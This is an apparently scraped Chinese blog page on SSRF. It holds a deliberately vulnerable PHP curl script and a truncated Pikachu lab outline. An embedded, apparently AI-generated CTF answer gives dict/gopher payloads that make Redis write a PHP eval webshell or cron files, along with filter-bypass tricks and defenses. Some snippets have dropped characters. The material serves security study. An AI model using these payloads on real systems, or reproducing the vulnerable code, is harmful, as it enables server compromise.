网安-SSRF-pikachu

最新推荐文章于 2025-07-23 19:15:38 发布
原创 最新推荐文章于 2025-07-23 19:15:38 发布 · 988 阅读 · 13 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

目录

SSRF:Server-Side Request Forgery

PHP curl

PHP 可能引起SSRF的函数

PHP其他函数

CURL其他协议

SSRF利用:

SSRF的发现 

工具

SSRF的防御

pikachu-SSRF

一:curl

1.访问连接:

2.读取本地文件

 3.dict协议扫描主机端口

二:file_get_content

4.http协议请求内网资源

SSRF:Server-Side Request Forgery

服务器端请求伪造:是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。因为是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统。SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。

PHP curl

<?php
function curl($url){  
    $ch = curl_init();
    // 设置URL和相应的选项
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0); // 启用时会将头文件的信息作为数据流输出  
    // 抓取URL并把它传递给浏览器  
    curl_exec($ch);
    //关闭cURL资源,并且释放系统资源  
    curl_close($ch);
}

$url = $_GET['url'];
curl($url);  
?>

获取网页资源——爬虫
webservice——获取接口数据
FTP——下载文件
php.ini extension=php_curl.dll

PHP 可能引起SSRF的函数

函数 作用
curl_exec() 执行 cURL 会话
file_get_contents() 将整个文件读入一个字符串
 
fsockopen() 打开一个网络连接或者一个Unix套接字连接

PHP其他函数

函数 作用
curl_exec() 执行 cURL 会话
file_get_contents() 将整个文件读入一个字符串
fsockopen() 打开一个网络连接或者一个Unix套接字连接
最低0.47元/天 解锁文章
Whoisshutiao
关注
入门25完结-SSRF
m0_61499194的博客
10-25 238
SSRF (Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的全漏洞,一般情况下,SSRF攻击的目标是外无法访问的内系统,也正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外隔绝的内部系统。利用这个漏洞,可以从漏洞服务器发出伪造的请求到目标服务上,目标服务可以是内的各类服务,可以使用不一样的协议,并根据回显来判断攻击是否成功(如果是盲打的话,就不用回显了:))。可以对内,本地进行端口扫描,查看端口的关闭状态;
pikachu通关记之SSRF服务器端请求伪造
qq_35258210的博客
01-21 486
"""本人小白,此贴仅作为记录我个人测试的思路、总结以便后期复习;今后本着少就是多,慢就是快的方式一步一个脚印进行学习,把这个知识点学扎实了,再学另外一个知识点。费曼教授是不是曾经说过以教代学是最好的学习方式?有很多错点可圈可指,所以也请dalao指出不对的地方,所谓教他人的时候也是在稳固自身""" 未做严格排版,后面有时间了再来整理整理 目录 SSRF(curl) SSRF(file_get_content) Ps:靶机链接:https://blog.youkuaiyun.com/qq_35258210
网络安全-SSRF漏洞原理、攻击与防御 (1)
2401_84215240的博客
11-23 968
SSRF(Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的一个全漏洞。一般情况下,SSRF 攻击的目标是从外无法访问的内部系统,因为服务器请求天然的可以穿越防火墙。漏洞形成的原因大多是因为服务端提供了从其他服务器应用获取数据的功能且。
网络安全-自学笔记
热门推荐
关注网络安全、云原生安全
12-01 21万+
目录 WEB(应用)全 前端全 xss攻击 后端全 文件上传漏洞 WebShell 解析全 数据全 sql注入 通信全 WEB(应用)全 前端全 xss攻击 后端全 文件上传漏洞 WebShell 解析全 数据全 sql注入 网络安全-sqlmap学习笔记 通信-http协议学习笔记(消息结构、请求方法、状态码等) ...
017SSRF漏洞(你的服务器在监守自盗)
喜欢Python编程的程序员柚柚呀
06-20 585
当我们把公司内的电脑换成服务器A,假设服务器A需要与内服务器B通讯,那么内服务器B就必定要允许服务器A对其访问。如果服务器A被别人利用了,那么服务器A就可以充当跳板,发送请求给内服务器B,获取各类敏感信息,这就是SSRF的攻击原理。SSRF(Server-Side Request Forgery),服务器请求伪造,即由攻击者构造请求,由服务端发起请求到其他服务器的全漏洞。一般情况下,SSRF 攻击的目标是外无法访问的内系统。
网络安全-SSRF漏洞原理、攻击与防御
资深程序员,曾自学JAVA,C#,如今从业于网安行业
02-22 917
SSRF(Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的一个全漏洞。一般情况下,SSRF 攻击的目标是从外无法访问的内部系统,因为服务器请求天然的可以穿越防火墙。漏洞形成的原因大多是因为服务端提供了从其他服务器应用获取数据的功能且没有对目标地址作正确的过滤和限制。
CSRF&SSRF漏洞
2501_91578299的博客
06-03 2034
网络安全的广袤领域中,CSRF 与 SSRF 漏洞犹如隐藏在暗处的 “络刺客”,悄无声息地威胁着用户数据全与系统稳定。对于刚踏入大门的新手小白而言,这两大漏洞的原理与防护知识既是亟需攻克的难关,也是开启网络安全技术探索之旅的重要钥匙。为帮助大家快速入门,本文精心梳理出全最全面的 CSRF、SSRF 漏洞讲解与实战演练,以通俗易懂的语言和详细步骤,带您揭开网络安全攻防的神秘面纱,筑牢网络安全的认知基石。
萌新学——pikachu(皮卡丘靶场)搭建+通关攻略+相关知识讲解
2402_86733709的博客
07-23 2591
(建议了解下列操作方便观看攻略)了解burpsuit的基本操作,会使用MySQLyog连接数据库(其他软件也行),
基于 BurpSuite 新版 MontoyaAPI 的 SSRF 漏洞自动探测插件,从零基础到精通,收藏这篇就够了!
Python_0011的博客
02-19 883
本公众号每日都会更新免费的工具,可以关注一下哦,星标我,更容易收到更新!
pikachu靶场搭建及模块练习
2301_80652627的博客
02-14 1092
前提:小皮的下载装。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8835
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 络时代生活越来越离不开络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于Web技术的智能生活管理应用LifeFlow_模块化设计整合生活事务运动健康学习发展三大核心模块通过直观可视化界面和智能数据分析提供全面个人管理解决方案_帮助用户建立有序生活节.zip
最新发布
12-06
基于Web技术的智能生活管理应用LifeFlow_模块化设计整合生活事务运动健康学习发展三大核心模块通过直观可视化界面和智能数据分析提供全面个人管理解决方案_帮助用户建立有序生活节.zip
项目极简说明这是一个专门用于管理和组织C语言及C项目中头文件的目录结构工具旨在提供一套标准化模块化的头文件存放方案通过预定义的头文件包含机制和目录布局规范帮助开发者高.zip
12-06
项目极简说明这是一个专门用于管理和组织C语言及C项目中头文件的目录结构工具旨在提供一套标准化模块化的头文件存放方案通过预定义的头文件包含机制和目录布局规范帮助开发者高.zip
【电动汽车充电站有序充电调度的分散式优化】基于蒙特卡诺和拉格朗日的电动汽车优化调度(分时电价调度)(Matlab代码实现)
12-06
【电动汽车充电站有序充电调度的分散式优化】基于蒙特卡诺和拉格朗日的电动汽车优化调度(分时电价调度)(Matlab代码实现)内容概要:本文介绍了基于蒙特卡洛和拉格朗日方法的电动汽车充电站有序充电调度优化方案,重点在于采用分散式优化策略应对分时电价机制下的充电需求管理。通过构建数学模型,结合不确定性因素如用户充电行为和电负荷波动,利用蒙特卡洛模拟生成大量场景,并运用拉格朗日松弛法对复杂问题进行分解求解,从而实现全局最优或近似最优的充电调度计划。该方法有效降低了电峰值负荷压力,提升了充电站运营效率与经济效益,同时兼顾用户充电便利性。 适合人群:具备一定电力系统、优化算法和Matlab编程基础的高校研究生、科研人员及从事智能电、电动汽车相关领域的工程技术人员。 使用场景及目标:①应用于电动汽车充电站的日常运营管理,优化充电负荷分布;②服务于城市智能交通系统规划,提升电与交通系统的协同水平;③作为学术研究案例,用于验证分散式优化算法在复杂能源系统中的有效性。 阅读建议:建议读者结合Matlab代码实现部分,深入理解蒙特卡洛模拟与拉格朗日松弛法的具体实施步骤,重点关注场景生成、约束处理与迭代收敛过程,以便在实际项目中灵活应用与改进。
高效的多分辨率融合技术对具有标签不确定性的遥感数据进行处理(Matlab代码实现)
12-06
高效的多分辨率融合技术对具有标签不确定性的遥感数据进行处理(Matlab代码实现)内容概要:本文介绍了基于Matlab代码实现的高效多分辨率融合技术,旨在处理具有标签不确定性的遥感数据。该技术通过融合不同分辨率的遥感图像,提升数据质量与分类精度,有效应对标签不准确或缺失带来的挑战。文中强调了算法在复杂遥感场景下的鲁棒性与实用性,并提供了完整的Matlab代码实现,便于科研人员复现与进一步优化。此外,文档还列举了多个相关研究方向和技术应用,涵盖电力系统、机器学习、图像处理、路径规划等领域,展示了一个综合性科研资源平台的支持能力。; 适合人群:具备一定Matlab编程基础,从事遥感数据处理、图像融合、模式识别及相关领域研究的科研人员与研究生。; 使用场景及目标:①提升遥感图像分类与目标识别的准确性;②处理带有标签噪声或不确定性的真实世界遥感数据;③开展多源遥感数据融合算法的研究与教学实践。; 阅读建议:建议读者结合提供的Matlab代码进行实践操作,深入理解多分辨率融合算法的设计思路与实现细节,同时可参考文档中列出的相关技术方向拓展研究视野。
Record_2025-12-06-15-27-41_2332cb9b27b851b548ba47a91682926c.mp4
12-06
Record_2025-12-06-15-27-41_2332cb9b27b851b548ba47a91682926c.mp4
基于PHP语言开发并集成MySQL数据库与Bootstrap前端框架构建的面向家教服务行业的全功能在线课程管理与交易平台_家教课程管理系统_家教平台_在线教育系统_用户注册登录_课.zip
12-06
基于PHP语言开发并集成MySQL数据库与Bootstrap前端框架构建的面向家教服务行业的全功能在线课程管理与交易平台_家教课程管理系统_家教平台_在线教育系统_用户注册登录_课.zip
麦麦云站访问控制系统V10_一个基于前后端分离架构构建的用于实现站精细化访问权限管理的专业级Web应用程序_该项目核心功能是实现对站资源的受控访问确保只有持有有效访问密.zip
12-06
麦麦云站访问控制系统V10_一个基于前后端分离架构构建的用于实现站精细化访问权限管理的专业级Web应用程序_该项目核心功能是实现对站资源的受控访问确保只有持有有效访问密.zip
ctf-ssrf-redis
06-14
<think>我们正在讨论CTF比赛中与SSRF(Server-SideRequestForgery)和Redis相关的攻击或防御技巧。根据提供的引用,攻击者常利用SSRF漏洞通过特定的协议(如dict或gopher)与内的Redis服务交互,进而实现未授权访问、写入Webshell或执行其他恶意操作。以下是相关的攻击技巧和防御方法的总结:###攻击技巧1.**利用dict协议攻击Redis**(引用[1]):-通过SSRF发送dict协议的请求到Redis服务,可以执行Redis命令。-典型攻击步骤:-设置Redis的工作目录:`configsetdir/var/www/html`-设置保存的文件名:`configsetdbfilenamewebshell.php`-写入Webshell内容:`settest"<?php@eval($_POST['cmd']);?>"`(注意:这里的引号需要正确转义)-保存:`save`-这样就在Web目录下写入了webshell.php文件,攻击者可以通过蚁剑等工具连接。2.**利用gopher协议攻击Redis**(引用[2]):-gopher协议功能更强大,可以发送多行命令。-使用工具(如gopherus)生成攻击payload:-生成Redis的payload:`./gopherus.py--exploitredis`-输入要执行的PHP代码(如`<?phpeval($_POST["123"]);?>`),生成gopher链接。-由于gopher协议在传输中需要正确编码,通常需要二次URL编码。-将生成的payload通过SSRF漏洞发送,即可在目标服务器上写入Webshell。3.**绕过过滤**(引用[3]):-题目中可能过滤了`file://`、`dict`、`127.0.0.1`、`localhost`等关键词。-绕过方法:-使用IP的十进制表示(如`2130706433`代表`127.0.0.1`)或`0.0.0.0`。-使用DNS重绑定技术。-使用非标准端口或协议(如http协议访问Redis的6379端口,但Redis不支持HTTP,所以通常用gopher或dict)。-利用URL解析特性,如`http://abc@127.0.0.1`、`http://127.0.0.1:80@evil.com`等。###防御技巧1.**过滤输入**:-对用户输入的URL进行严格检查,禁止访问内IP和特殊协议(如dict、gopher)。-使用正则表达式过滤,但要注意绕过技巧(如IP的多种表示形式)。2.**限制协议**:-只允许HTTP/HTTPS协议,禁止其他协议。3.**络隔离**:-将关键服务(如Redis)置于内,并设置防火墙规则,禁止外部访问。4.**Redis全配置**:-为Redis设置强密码认证。-限制Redis的绑定IP(不要绑定在0.0.0.0)。-以低权限用户运行Redis,并限制其文件写入权限。5.**使用SSRF防护机制**:-在服务端设置请求的目标地址白名单。-使用DNS解析并验证目标IP是否在允许范围内。###示例:攻击Redis写入Webshell假设存在SSRF漏洞,且内Redis无认证,攻击者可以构造如下dict协议的请求(注意空格和换行需要正确编码):```dict://127.0.0.1:6379/configsetdir/var/www/htmldict://127.0.0.1:6379/configsetdbfilenameshell.phpdict://127.0.0.1:6379/settest"<?php@eval($_POST['cmd']);?>"dict://127.0.0.1:6379/save```但实际中,由于dict协议一次只能发送一个命令,且需要多个请求,因此通常使用gopher协议在一个请求中发送多个命令。###注意事项-在CTF中,Redis可能运行在非默认端口或需要绕过过滤。-写入Webshell的路径需要可写,且Web服务器能够解析。§§相关问题§§1.如何防御SSRF攻击Redis?2.在CTF中,如果过滤了dict和gopher协议,还有哪些方法可以利用SSRF攻击Redis?3.Redis除了写入Webshell,还可以利用SSRF进行哪些攻击?</think>### CTF SSRF Redis攻击与防御技巧 在CTF比赛中,SSRF(服务端请求伪造)结合Redis的攻击是常见题型。以下是关键技巧总结: --- #### **攻击技巧(利用SSRF操作Redis)** 1. **协议利用** - **dict协议**:直接发送Redis命令(需URL编码) ```http dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html ``` - **gopher协议**(更强大):支持多行命令,常用工具`gopherus`生成Payload ```python # 生成Payload示例(自动处理换行编码) ./gopherus.py --exploit redis ``` 2. **写入Webshell** - 经典四步操作: ```redis CONFIG SET dir /var/www/html # 设置保存目录 CONFIG SET dbfilename shell.php # 设置文件名 SET payload "<?php eval($_POST['cmd']);?>" # 写入恶意代码 SAVE # 保存到文件 ``` - 需注意特殊字符转义(如`<`需转为`<`) 3. **绕过过滤** - **IP绕过**:用`0.0.0.0`、`2130706433`(127.0.0.1的整数形式)或`localhost`替代 - **协议绕过**:若过滤`dict/gopher`,尝试`http://0.0.0.0:6379/?`(需Redis支持HTTP) - **分块编码**:对Payload二次URL编码(引用[2]示例) 4. **其他利用方式** - 写计划任务:`CONFIG SET dir /var/spool/cron/` - 主从复制攻击:通过`SLAVEOF`命令控制Redis从恶意服务器加载模块 - 读取敏感文件:`CONFIG GET *`获取Redis配置 --- #### **防御技巧** 1. **输入过滤** - 协议黑名单:禁用`file://`、`dict://`、`gopher://` - IP/域名限制:过滤`127.0.0.1`、`localhost`、内IP段 - 正则强化:检测异常路径(如`/var/spool/cron`) 2. **Redis加固** ```bash # 关键配置 bind 127.0.0.1 # 只监听本地 requirepass "强密码" # 启用认证 rename-command CONFIG "" # 禁用危险命令 ``` 3. **服务隔离** - 将Redis部署在内,禁止公访问 - 使用防火墙限制6379端口的来源IP 4. **权限控制** - Redis以低权限用户运行(非root) - 限制Web目录写权限(防止写Shell) --- #### **CTF实战要点** 1. **判断Redis存在**:尝试访问`http://target:6379`若返回`-ERR wrong number of arguments`则存在。 2. **编码处理**: - 使用工具(如gopherus)自动生成编码后的Payload - 二次URL编码绕过WAF(引用[2]案例) 3. **回显利用**:若命令无回显,可通过延时或DNS外带数据判断执行结果。 > 参考案例:某CTF题通过SSRF的gopher协议发送Redis命令写入Webshell,最终用蚁剑连接获取flag(引用[2])。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值